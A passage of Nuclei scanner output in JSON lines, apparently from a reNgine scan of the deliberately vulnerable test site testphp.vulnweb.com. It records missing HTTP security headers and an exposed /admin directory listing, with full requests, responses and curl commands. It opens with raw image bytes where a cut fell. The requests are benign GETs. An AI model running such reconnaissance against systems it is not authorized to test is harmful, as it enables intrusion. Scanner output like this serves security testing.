ufffdY\\ufffd\\ufffd\\ufffd'\\ufffdh\\u001c\\ufffd\\u0019\\ufffdX\\ufffd\\ufffdH'\\ufffdv9\\ufffd`\\ufffdx\\ufffd\\r^oOI,m\\u0014L\\ufffd\\ufffd\\ufffdu\\u000b\\ufffd-\\ufffd\\ufffd\\ufffd1\\ufffd\\ufffd\\ufffd\\ufffd\\u0018,:\\ufffd\\ufffdjz}\\ufffd\\u0007\\ufffd)\\u0019\\ufffd\\u001aC\\ufffd\\u0002O\\ufffd\\ufffd$\\ufffd\\ufffd\\ufffdƥo4A^DuG\\ufffd\\ufffd*@lw\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\te\\ufffdm\\ufffd\\ufffd2e\\u001d\\ufffd\\ufffdf#\\u001d\\ufffd\\ufffdj\\ufffd\\u0019\\ufffd\\u0015\\ufffd*\\ufffd\\ufffd\\ufffd#\\u0019\\ufffd\\u001a\\ufffd\\u0004+\\ufffdYZy\\u001a\\u0015\\ufffd\\ufffd1\\ufffd$)\\u003c\\u0003\\ufffd\\ufffd5\\\"\\ufffdc\\u0026\\ufffd'4f\\ufffd4S\\ufffd\\u0000\\ufffdk=\\ufffd\\ufffdo4r\\ufffdp\\ufffd\\ufffd\\ufffd\\ufffd\\u000e\\u0008\\ufffd\\ufffdׯJpj\\ufffd\\ufffd\\u0006\\ufffdL\\ufffdw\\ufffd\\u0007\\ufffde0\\ufffd\\ufffdVy\\u0002`g\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd'\\ufffdN\\ufffd\\ufffd\\ufffd\\ufffdu\\ufffdV\\ufffd\\ufffd,\\ufffd\\ufffd7\\ufffd\\ufffd'\\ufffd\\ufffd\\ufffd\\u0015=tx\\ufffd\\ufffdiV\\ufffdRM\\u003e\\ufffd$Aj\\ufffd\\ufffdG\\ufffdI!\\ufffd\\u0010U\\ufffd…\\u0003\\u0019\\ufffd$\\u001e\\ufffd\\ufffd\\ufffd*\\ufffdmF{۝\\ufffd;I+vO%\\ufffd\\ufffd\\ufffd4\\ufffd\\ufffd6y\\ufffd\\u0008\\u003c\\u000f\\ufffd\\ufffd\\ufffd\\ufffdԯ\\ufffd!\\ufffdb\\ufffd$\\ufffd\\ufffdx\\ufffd\\ufffd\\ufffd?\\ufffd\\ufffd\\ufffdU\\ufffdKo\\ufffd\\ufffdq\\ufffd\\ufffd\\ufffd@\\ufffd\\ufffd\\ufffd\\u0016f\\\\*㑜\\u0001\\ufffd\\ufffd\\ufffdI\\ufffd4\\ufffd\\ufffdi\\ufffd\\ufffdIyܤQ\\ufffd\\ufffdҾ\\ufffd\\ufffdX`\\u0005’A\\ufffd'\\u0004`.y\\ufffd\\ufffd/\\ufffd]\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd:\\ufffd\\ufffd6\\ufffd\\ufffd\\u001f\\ufffdg\\u0008\\ufffd\\ufffd4i-\\ufffdz:\\ufffd\\u0011gP\\ufffd\\ufffdQ\\ufffd0\\ufffd\\u0011\\ufffd\\ufffdi\\ufffd\\ufffd\\ufffd'\\ufffd\\ufffd\\ufffddG[\\ufffd\\u001c\\ufffd\\u001fO8a\\ufffd\\u0006F\\u0008\\ufffd{\\ufffd\\ufffdt}D\\ufffd\\ufffd\\ufffd5\\u0008\\ufffd\\ufffd0!\\ufffd\\ufffd\\u0012\\ufffd\\u000c9\\u001d\\ufffd\\ufffd\\ufffd2s\\ufffd5\\ufffdu\\r\\u003e\\ufffdloo\\ufffd\\ufffd]\\u001cY\\ufffd\\ufffd\\ufffd+.v\\ufffd\\u003e\\ufffd\\ufffd(@\\ufffd\\u0001 \\u0013\\ufffdL'\\ufffdt\\ufffd\\ufffd9Y\\ufffd\\ufffdTs\\ufffd\\ufffd5\\ufffd5l\\ufffd\\u000b\\ufffd\\\"m\\ufffd\\u001c\\ufffd\\ufffd\\ufffdp\\ufffd\\ufffd\\ufffdL\\u000c\\ufffd\\ufffd5\\ufffdo48\\ufffdNE;U%\\ufffd\\ufffd,\\ufffd\\ufffdm\\u0007h\\ufffd'\\ufffd@\\ufffdy\\u0002\\ufffd}R \\ufffd\\ufffd-\\ufffd\\ufffd\\ufffd\\u0000\\n\\ufffdpO\\u001f\\ufffd5\\ufffdU\\ufffd\\ufffdh\\ufffd\\ufffd\\u0015\\ufffd\\ufffdX\\ufffd\\ufffd\\ufffdN\\u003e\\ufffd\\ufffd㑭g\\u001704\\ufffd!V\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u001fW\\ufffdO\\ufffd\\u0007\\ufffd\\ufffd\\u000bk\\t\\u0007\\ufffd\\ufffd\\ufffd%[Y\\ufffdC\\u0012\\ufffd\\ufffdA]Č\\u0010A\\ufffdG\\ufffd]\\u001a\\ufffd\\ufffd\\ufffd\\ufffd\\u001eL\\ufffd\\ufffdY\\ufffd9\\ufffdcX\\ufffd\\ufffdI!\\ufffd\\ufffdVF#*\\u0003.\\u00187\\u001fP\\u003c\\ufffd\\u0000\\t\\ufffd\\u003c\\ufffdՑ\\ufffdI}$\\ufffd\\\"\\ufffd\\ufffdv\\ufffd\\ufffd\\n\\ufffd\\ufffd\\u003e\\ufffdx\\ufffdd\\ufffd\\ufffd\\ufffd\\r\\ufffd\\u001f\\ufffd\\ufffdM\\ufffdu\\ufffd}+\\ufffd\\u0008 \\u001f\\ufffd\\u0003\\u0000\\ufffd\\ufffd\\ufffd\\u0019M\\ufffd'\\ufffd\\ufffdY#\\ufffdf%[\\ufffd[\\ufffd\\u003ej\\ufffd\\ufffd6\\ufffd\\u0007,4\\ufffdy\\u001elVh\\ufffdY-\\ufffd\\ufffdH\\ufffd\\ufffd\\u0019\\ufffd\\ufffdd\\ufffd\\ufffdc\\ufffd\\ufffd\\ufffd\\ufffd\\u0003A4~夤{\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd}\\ufffd^\\ufffdۊ\\ufffdY\\u0011\\u001c\\ufffd\\ufffd\\u0005\\u0015\\ufffd\\ufffd\\u0014\\n\\ufffd\\ufffdp\\u0013S\\ufffdE\\u0015D\\u0003\\ufffdbO\\u003c\\ufffd\\ufffd\\u001b\\ufffd0e8 \\ufffdV1R*ѐ\\u0006\\ufffd\\ufffd\\ufffd.\\ufffdm\\u0004\\ufffdOs \\ufffd\\ufffd\\ufffds\\ufffd6H]\\ufffd\\ufffd`\\ufffd\\ufffd\\ufffd\\ufffd3U\\u000b1' \\ufffdx⽣\\u001c\\ufffd\\ufffd%\\ufffd\\ufffd\\ufffd?W\\ufffdg\\ufffd2\\ufffd\\\"F\\ufffd#\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u0003\\ufffd'\\ufffd\\ufffdO4v\\ufffdi\\ufffd1\\u0012_N\\ufffd\\ufffd=\\ufffd\\u0006\\ufffd\\ufffd\\u0004p\\u003e9?\\u001d\\ufffd+\\ufffd\\ufffd\\ufffdMoq\\u001c\\ufffd\\u0001d`ps\\ufffd\\ufffdW\\u0010\\ufffd\\ufffd\\ufffd\\ufffdsp=ûs\\ufffdO?\\ufffd\\ufffd?\\ufffd\\ufffd\\ufffdDlk+op\\ufffdt\\ufffd\\ufffdEw\\ufffdZ_\\ufffd\\ufffdݐ\\ufffd`VN\\u001c\\ufffd[ \\u000c\\ufffd\\u0015\\ufffdx\\ufffd\\ufffdrMd\\ufffdZD~\\ufffd\\ufffd3%\\ufffdO\\ufffd4\\ufffd7\\u003e\\ufffd3\\ufffd\\u0007\\ufffddc\\u0019$p\\u003cҶ\\ufffd\\ufffd\\ufffd\\ufffdxgc\\ufffd\\ufffdxQ\\ufffd\\u0001\\ufffd4Ţ\\ufffdq\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdp#Q\\ufffd?[s\\ufffd\\u001cu\\ufffd\\ufffdk\\ufffdzkj\\ufffd:^%\\ufffdv\\u0019I7\\ufffd\\ufffdU\\ufffd\\\"\\ufffd{\\ufffdɍF\\ufffd\\ufffdBeKd}\\u0001\\ufffdF@a\\ufffd\\ufffd\\ufffd\\u0003\\ufffd\\ufffd\\ufffd\\ufffdۙIPpA\\ufffd\\ufffdNWZ\\ufffd\\u0017\\ufffd\\ufffd\\u0015U}\\ufffdm\\ufffd\\ufffd\\u0004\\ufffd\\ufffd\\ufffdH\\r\\ufffdĆ\\u0004s\\ufffd?\\ufffd\\ufffdWv*\\u0016K\\ufffdܬ,#۵]\\ufffd\\ufffd\\ufffd9;A\\u0003\\ufffd9\\u0000.y'\\ufffdZuҩF\\u001a\\ufffd\\ufffd\\ufffd\\ufffd3\\ufffdx34\\ufffd(\\ufffd\\ufffd\\ufffdC\\u0004;\\ufffd\\u0008\\ufffd`%m\\ufffd\\ufffd\\u0001\\ufffd\\ufffd\\ufffd#?I\\u000c\\u0000\\ufffdx\\u00002\\ufffd\\ufffd\\u0002=\\ufffd\\u0018\\ufffd\\u0005?$\\u001c\\ufffd\\ufffd\\ufffdx,e\\ufffdBM\\u0019u_i\\ufffd\\u001fKl\\ufffd\\u003e\\u0006_\\ufffd\\ufffd \\u000f\\ufffd\\ufffd]\\u0026\\ufffd\\ufffd\\ufffd\\ufffdH\\ufffdSsl\\ufffdtI\\u00260\\ufffd7\\u0001\\ufffd\\ufffd\\ufffd:\\u001eǒ9\\u0015\\u001d.\\ufffd\\ufffd3\\ufffdM\\ufffd\\ufffd\\ufffdC(\\ufffd\\ufffd\\ufffdLѣ}\\u003ev\\ufffd\\ufffd*\\ufffd1\\ufffd\\ufffd\\u003e\\ufffd\\u0007\\u0018$\\ufffd0r\\t\\ufffd~\\ufffdi\\u001d\\ufffd\\ufffdΰF\\ufffd2\\ufffd\\ufffd񗍷3`+\\u0012\\ufffd\\u0018\\ufffd\\ufffd\\u0001\\ufffdH\\ufffdHQ\\ufffd\\ufffdʉmqs\\ufffd\\ufffdgEf\\ufffd-\\ufffd\\ufffd\\u0007gh*3\\ufffd2\\ufffd\\u001b\\u0003\\ufffd\\ufffdq\\ufffd5\\ufffd\\ufffd\\ufffd\\ufffdM\\ufffd2-\\ufffd˔\\\"Ux\\ufffd,Y\\ufffd\\u0000\\ufffdv\\n\\ufffd\\ufffd\\u001c\\u000e2AbR\\ufffd\\ufffd6\\ufffdJ\\ufffd\\ufffd\\ufffd=\\ufffd\\ufffd\\ufffd[\\ufffd7\\ufffd\\u0014Q]\\ufffd\\u000f\\u0014T\\ufffd*\\ufffd\\u000c(\\ufffd\\ufffdt\\u0002EM@\\ufffd\\u0015D\\u0002jS\\ufffd\\ufffdEd\\ufffdI\\ufffd\\ufffd\\ufffd32\\ufffd\\ufffd\\ufffdb=\\u001a\\ufffd\\u001a\\u001cV\\ufffd)\\ufffd\\ufffd\\ufffd\\u0001\\ufffd\\t?\\ufffdo۱\\u0015\\u001a5\\ufffd\\ufffd\\ufffdXZU\\ufffdp$3\\u001e8\\u001f\\ufffd\\\\\\ufffd\\u0002x\\ufffdY\\ufffd\\ufffd\\ufffd\\ufffd12\\ufffd\\ufffd\\u0003r\\ufffd?\\ufffd\\ufffdԳ\\ufffd\\ufffd8=ؼ\\ufffdՔ\\ufffde9\\u0004v*\\ufffd\\ufffd\\ufffd,\\u0011f\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd8l6d!rz\\u0019$*\\ufffd\\ufffd\\u0001\\ufffd+oC\\ufffd\\ufffd\\ufffd޳J\\ufffdy\\u0002'\\ufffd\\ufffd(9w\\ufffd\\ufffd\\u0007\\ufffd\\u001f\\ufffd\\ufffd\\u0004\\ufffd[S\\ufffd\\u0016{d\\ufffd\\ufffd\\ufffdtL^!\\ufffd\\u0014ۺ \\ufffd;X\\ufffdCt\\ufffd#\\u001e;\\ufffd'\\ufffd\\ufffdk\\ufffd\\ufffd\\ufffd\\ufffduHu\\u001cn\\ufffd\\ufffd4n\\ufffdb\\u000b\\u0013\\ufffd9\\ufffd!o(H\\ufffdV$\\ufffdg\\ufffd!\\ufffd0\\u0007q\\u0019\\ufffd\\ufffd}D\\ufffd:\\ufffd\\ufffd\\u0008w\\ufffdVT`Tgk\\u00021\\ufffd\\u001f\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdrj\\ufffd\\ufffdk\\ufffd'\\ufffd\\ufffdK\\u0016f\\u0003h\\ufffd\\ufffd\\ufffd\\ufffd[J\\ufffdv\\ufffd\\u001bk\\ufffd\\ufffd \\ufffd,b\\u0011Š\\ufffd\\u0026a\\ufffd\\ufffd\\ufffd\\ufffdX\\u0012\\ufffd2\\ufffdI\\ufffd\\ufffd\\u0002\\ufffd\\ufffdT|\\u003e\\ufffd\\ufffdi4\\ufffd\\ufffd\\ufffd\\ufffdl\\ufffd\\ufffd\\n\\ufffd\\ufffd\\ufffd;eܜu\\ufffd\\ufffd\\ufffd\\u0000|\\ufffdE\\ufffd\\ufffdܶ\\u0000$\\ufffdv\\ufffd\\u0001$\\ufffdN\\u0007\\u0003\\ufffdO\\ufffd\\ufffd}Ci\\u001a\\u0004\\ufffd\\ufffd9\\ufffdl2ZE*I?lq\\ufffd羱Ks[\\ufffd\\u0014\\ufffdӴvq\\ufffd\\ufffdz\\ufffd\\ufffdȩǂMcc\\ufffdQE\\u0015ć\\n\\ufffd(\\ufffd\\ufffdI4\\n(\\ufffd@\\u0026\\ufffdE\\u0015X\\ufffd\\ufffd\\ufffd\\ufffdO\\ufffd\\ufffdЬo4幞6i\\\"i\\u001c\\ufffd\\\\H\\u0001L+\\u000f\\ufffdOX\\u003c\\ufffd\\ufffd\\n+Zڎ\\ufffdB\\ufffdȾ\\ufffda@\\u0019\\ufffdx\\ufffd\\u001d\\n\\u0008澉%@\\ufffd͂\\ufffd\\ufffd)\\ufffd\\ufffd\\ufffd\\u000e\\ufffdV\\ufffdh\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u0011\\ufffd\\ufffd!=\\ufffd\\u000c\\u001e?\\ufffd\\ufffd\\ufffd\\ufffdwcmh\\ufffd\\ufffd\\ufffd\\r\\ufffd6|1\\u003c}L\\u0015G\\ufffd@\\n\\u0007\\ufffd\\u0014Q^}\\ufffd~fs\\ufffd\\ufffd!\\ufffd\\u0005\\ufffd\\ufffd#\\ufffd\\ufffd\\ufffd\\ufffdيX\\ufffd\\ufffd\\ufffd\\ufffdWyB\\ufffd\\u003c\\ufffd\\ufffd=\\u001c\\ufffd\\u0019\\ufffd\\ufffdj\\ufffdԒ46dE\\ufffdW\\ufffd#*\\ufffd\\u0002D\\ufffds\\ufffd\\ufffd~\\ufffd\\u001c\\ufffdsE\\u0015\\ufffd\\ufffdb\\ufffd\\ufffd7-\\ufffdI\\ufffd\\\"\\ufffd\\u00126\\ufffd\\ufffdA\\u0006\\ufffd4]\\ufffd\\ufffd]\\u001b\\ufffd\\ufffd5\\ufffd\\u0008cx\\ufffd\\ufffd1\\ufffdъ\\ufffd\\u001c\\ufffdt\\ufffd\\ufffdA\\ufffdS\\ufffd\\ufffd\\ufffdEz\\u003e3\\ufffd\\u000b\\ufffd%|\\ufffd\\ufffd\\ufffdMSF\\ufffd\\ufffd\\ufffd\\n\\ufffdI\\ufffdrG\\ufffd\\ufffd1\\ufffdI\\ufffd:żp\\ufffd\\ufffdl\\u0017r\\ufffd\\u0017\\u0001\\ufffd\\ufffd\\u0002\\ufffd\\u0015\\ufffd\\u001fO\\u0003\\ufffd\\ufffd\\u0001\\ufffd\\u0002\\ufffd(\\ufffdj\\ufffdK\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:42:01.205703867Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_5) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/9.1.2 Safari/605.1.15' 'http://testphp.vulnweb.com/pictures/1.jpg.tn'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"clear-site-data\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/hpp\",\"path\":\"/hpp\",\"matched-at\":\"http://testphp.vulnweb.com/hpp/\",\"request\":\"GET /hpp HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.80 Safari/537.36 Edg/98.0.1108.50\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html; charset=UTF-8\\r\\nDate: Wed, 13 Nov 2024 02:41:40 GMT\\r\\nServer: nginx/1.19.0\\r\\nX-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1\\r\\n\\r\\n\\u003ctitle\\u003eHTTP Parameter Pollution Example\\u003c/title\\u003e\\r\\n\\r\\n\\u003ca href=\\\"?pp=12\\\"\\u003echeck\\u003c/a\\u003e\\u003cbr/\\u003e\\r\\n\\r\\n\\u003chr\\u003e\\r\\n\\u003ca href='http://blog.mindedsecurity.com/2009/05/client-side-http-parameter-pollution.html'\\u003eOriginal article\\u003c/a\\u003e\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:42:01.372939666Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.80 Safari/537.36 Edg/98.0.1108.50' 'http://testphp.vulnweb.com/hpp'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"cross-origin-embedder-policy\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-2/A01\",\"path\":\"/Mod_Rewrite_Shop/BuyProduct-2/A01\",\"matched-at\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-2/A01\",\"request\":\"GET /Mod_Rewrite_Shop/BuyProduct-2/A01 HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Edg/94.0.992.31\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html; charset=UTF-8\\r\\nDate: Wed, 13 Nov 2024 02:41:33 GMT\\r\\nServer: nginx/1.19.0\\r\\nX-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1\\r\\n\\r\\n\\u003cdiv\\u003eThanks for buying \\u003cb\\u003e Web Camera A4Tech PK-335E\\u003c/b\\u003e\\u003cbr\\u003e\\u003cbr\\u003e\\u003c/div\\u003e\\r\\n\\t\\t\\t\\t\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:42:01.372976699Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Edg/94.0.992.31' 'http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-2/A01'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"cross-origin-embedder-policy\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-3/A01\",\"path\":\"/Mod_Rewrite_Shop/BuyProduct-3/A01\",\"matched-at\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-3/A01\",\"request\":\"GET /Mod_Rewrite_Shop/BuyProduct-3/A01 HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html; charset=UTF-8\\r\\nDate: Wed, 13 Nov 2024 02:41:33 GMT\\r\\nServer: nginx/1.19.0\\r\\nX-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1\\r\\n\\r\\n\\u003cdiv\\u003eThanks for buying \\u003cb\\u003e Laser Color Printer HP LaserJet M551dn, A4\\u003c/b\\u003e\\u003cbr\\u003e\\u003cbr\\u003e\\u003c/div\\u003e\\r\\n\\t\\t\\t\\t\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:42:01.535915603Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36' 'http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-3/A01'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"content-security-policy\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/admin\",\"path\":\"/admin\",\"matched-at\":\"http://testphp.vulnweb.com/admin/\",\"request\":\"GET /admin HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 11_6_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html\\r\\nDate: Wed, 13 Nov 2024 02:41:35 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\u003chtml\\u003e\\r\\n\\u003chead\\u003e\\u003ctitle\\u003eIndex of /admin/\\u003c/title\\u003e\\u003c/head\\u003e\\r\\n\\u003cbody\\u003e\\r\\n\\u003ch1\\u003eIndex of /admin/\\u003c/h1\\u003e\\u003chr\\u003e\\u003cpre\\u003e\\u003ca href=\\\"../\\\"\\u003e../\\u003c/a\\u003e\\r\\n\\u003ca href=\\\"create.sql\\\"\\u003ecreate.sql\\u003c/a\\u003e 11-May-2011 10:27 523\\r\\n\\u003c/pre\\u003e\\u003chr\\u003e\\u003c/body\\u003e\\r\\n\\u003c/html\\u003e\\r\\n\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:42:01.535959535Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 11_6_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36' 'http://testphp.vulnweb.com/admin'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"x-content-type-options\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop\",\"path\":\"/Mod_Rewrite_Shop\",\"matched-at\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/\",\"request\":\"GET /Mod_Rewrite_Shop HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:56.0) Gecko/20100101 Firefox/56.0\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html; charset=UTF-8\\r\\nDate: Wed, 13 Nov 2024 02:41:33 GMT\\r\\nServer: nginx/1.19.0\\r\\nX-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1\\r\\n\\r\\n\\u003chtml\\u003e\\r\\n\\u003cdiv id=\\\"content\\\"\\u003e\\r\\n\\t\\u003cdiv class='product'\\u003e\\u003ctable\\u003e\\u003ctr\\u003e\\u003ctd width='180px'\\u003e\\u003cimg src='images/1.jpg'\\u003e\\u003c/td\\u003e\\u003ctd width='400px'\\u003e\\u003ca href='Details/network-attached-storage-dlink/1/'\\u003eNetwork Storage D-Link DNS-313 enclosure 1 x SATA\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd width='50px' bgcolor='#F8F8F8'\\u003e\\u003ca href='Details/network-attached-storage-dlink/1/'\\u003ePrice\\u003cbr\\u003e359 \\u0026euro;\\u003c/a\\u003e\\u003c/td\\u003e\\u003c/table\\u003e\\u003c/tr\\u003e\\u003c/div\\u003e\\u003cdiv class='product'\\u003e\\u003ctable\\u003e\\u003ctr\\u003e\\u003ctd width='180px'\\u003e\\u003cimg src='images/2.jpg'\\u003e\\u003c/td\\u003e\\u003ctd width='400px'\\u003e\\u003ca href='Details/web-camera-a4tech/2/'\\u003eWeb Camera A4Tech PK-335E\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd width='50px' bgcolor='#F8F8F8'\\u003e\\u003ca href='Details/web-camera-a4tech/2/'\\u003ePrice\\u003cbr\\u003e10 \\u0026euro;\\u003c/a\\u003e\\u003c/td\\u003e\\u003c/table\\u003e\\u003c/tr\\u003e\\u003c/div\\u003e\\u003cdiv 